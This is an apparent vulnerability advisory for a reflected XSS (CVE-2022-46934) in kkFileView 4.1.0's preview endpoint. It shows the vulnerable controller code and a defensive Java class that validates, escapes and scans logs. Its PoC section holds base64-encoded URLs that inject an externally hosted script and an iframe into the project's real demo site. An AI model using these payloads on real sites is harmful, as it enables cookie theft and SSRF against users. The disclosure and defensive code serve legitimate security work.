CVE-2022-46934: kkFileView XSS Vulnerability · Issue #411 · kekingcn/kkFileView
kkFileView v4.1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the url parameter at /controller/OnlinePreviewController.java.
Description
kkFileView v4.1.0 has an XSS vulnerability, which may lead to leakage of the website's cookies and to iframe SSRF.
Vulnerable code location
The vulnerable code is at line 59 of kkFileView/server/src/main/java/cn/keking/web/controller/OnlinePreviewController.java. The "url" parameter is user-controllable and is output to the page without filtering special characters.
```java
// Excerpt from OnlinePreviewController.java in kkFileView v4.1.0 (the vulnerable version).
@GetMapping("/onlinePreview")
public String onlinePreview(String url, Model model, HttpServletRequest req) {
    String fileUrl;
    try {
        // "url" is only base64 decoded; it is neither validated nor escaped
        fileUrl = WebUtils.decodeUrl(url);
    } catch (Exception ex) {
        String errorMsg = String.format(BASE64_DECODE_ERROR_MSG, "url");
        return otherFilePreview.notSupportedFile(model, errorMsg);
    }
    FileAttribute fileAttribute = fileHandlerService.getFileAttribute(fileUrl, req);
    // the attribute, including the decoded url, reaches the view unfiltered
    model.addAttribute("file", fileAttribute);
    FilePreview filePreview = previewFactory.get(fileAttribute);
    logger.info("预览文件url:{},previewType:{}", fileUrl, fileAttribute.getType());
    return filePreview.filePreviewHandle(fileUrl, model, fileAttribute);
}
```
PoC
The official demo site runs the latest version, 4.1.0, and is used here as the demonstration. Visit the vulnerable endpoint (the url parameter value must be base64 encoded and URL encoded):
https://file.keking.cn/onlinePreview?url=aHR0cDovLyI+PHNjcmlwdC9zcmM9aHR0cHM6Ly94c3Mucm9ja3MveHNzLmpzPi90ZXN0LnBuZw==
https://file.keking.cn/onlinePreview?url=aHR0cDovLyI+PGlmcmFtZS9zcmM9aHR0cHM6Ly91YXQtazhzLmtla2luZy5jbi8gaGVpZ2h0PTEwMDAgd2lkdGg9MTAwMD4vdGVzdC5wbmc=
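The root cause described above is that the decoded url value is trusted as-is, and the PoC shows the attack arrives as a base64 value in the url query parameter. The following stand-alone class is an added example, not kkFileView's own code and not the project's fix: it shows the two defensive steps a handler should take (parse the decoded value with java.net.URI, which rejects quotes, angle brackets and whitespace, then restrict the scheme and HTML-escape the value before it is rendered) and reuses the same check to flag access-log lines whose url parameter does not decode to a clean URL. The class name PreviewUrlGuard, the allowed scheme list, the decodeParam helper (plain base64 of a UTF-8 string; the real WebUtils.decodeUrl may do more) and the log lines are all assumptions or constructed samples.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.Base64;
import java.util.List;
import java.util.Set;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/** Hypothetical helper (not kkFileView code): safe handling of the base64 "url" parameter. */
public class PreviewUrlGuard {
    // Assumption: only these schemes are legitimate sources for a file preview.
    private static final Set<String> ALLOWED_SCHEMES = Set.of("http", "https", "ftp");

    /** Assumption: the parameter is plain base64 of a UTF-8 URL. Throws IllegalArgumentException on bad input. */
    static String decodeParam(String param) {
        return new String(Base64.getDecoder().decode(param), StandardCharsets.UTF_8);
    }

    /**
     * java.net.URI rejects '"', '<', '>' and whitespace outright; on top of that we require an
     * absolute URL with an allowed scheme and a host. Returns the normalised URL string.
     */
    static String validate(String decoded) throws URISyntaxException {
        URI uri = new URI(decoded);
        if (!uri.isAbsolute() || uri.getHost() == null
                || !ALLOWED_SCHEMES.contains(uri.getScheme().toLowerCase())) {
            throw new URISyntaxException(decoded, "not an absolute URL with an allowed scheme and a host");
        }
        return uri.toString();
    }

    /** Escape the value before it is written into HTML text or an attribute. */
    static String escapeHtml(String s) {
        StringBuilder sb = new StringBuilder(s.length());
        for (char c : s.toCharArray()) {
            switch (c) {
                case '&': sb.append("&amp;"); break;
                case '<': sb.append("&lt;"); break;
                case '>': sb.append("&gt;"); break;
                case '"': sb.append("&quot;"); break;
                case '\'': sb.append("&#39;"); break;
                default: sb.append(c);
            }
        }
        return sb.toString();
    }

    // Pulls the raw base64 value of the url parameter out of a request line (percent-decoding omitted).
    private static final Pattern URL_PARAM = Pattern.compile("[?&]url=([A-Za-z0-9+/=]+)");

    /** Detection: return the access-log lines whose url parameter does not decode to a valid URL. */
    static List<String> suspiciousRequests(List<String> accessLog) {
        List<String> hits = new ArrayList<>();
        for (String line : accessLog) {
            Matcher m = URL_PARAM.matcher(line);
            if (!m.find()) continue;
            try {
                validate(decodeParam(m.group(1)));
            } catch (IllegalArgumentException | URISyntaxException e) {
                hits.add(line); // malformed base64, or a decoded value that is not a clean URL
            }
        }
        return hits;
    }

    static String b64(String s) {
        return Base64.getEncoder().encodeToString(s.getBytes(StandardCharsets.UTF_8));
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample log lines: one ordinary preview request, one whose decoded value carries markup.
        String fmt = "10.0.0.5 - - [01/Dec/2022:10:00:00 +0000] \"GET /onlinePreview?url=%s HTTP/1.1\" 200 512";
        List<String> log = List.of(
                String.format(fmt, b64("http://files.example.com/report.pdf")),
                String.format(fmt, b64("http://\"><b>injected</b>/test.png")));

        // The handler path: decode, validate, escape, then render.
        System.out.println("validated: " + escapeHtml(validate(decodeParam(b64("http://files.example.com/report.pdf")))));
        // The detection path over the constructed log: only the second line is flagged.
        for (String hit : suspiciousRequests(log)) {
            System.out.println("flagged:   " + hit);
        }
    }
}
```

Run it with `java PreviewUrlGuard.java` (Java 11 or newer). Validation and escaping are deliberately separate: the URI parse stops a value like the PoC's from ever reaching the model, while the escape step protects the template even if a future decoder change lets something through.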